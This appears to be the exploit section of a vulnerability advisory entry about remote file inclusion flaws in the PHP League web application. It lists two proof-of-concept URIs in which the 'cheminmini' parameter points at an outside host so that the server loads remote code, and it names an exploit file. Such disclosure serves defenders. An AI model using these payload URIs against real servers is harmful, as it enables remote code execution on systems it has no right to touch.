• info
• discussion
• exploit
• solution
• references

PHP League Multiple Remote File Include Vulnerabilities

Attackers can exploit this issue via a web client.

The following proof-of-concept exploit code and URIs are available:

http://www.example.com/consult/miniseul.php?cheminmini=http://www.example2.com
http://www.example.com/config.php?cheminmini=http://www.example2.com

• /data/vulnerabilities/exploits/20756.php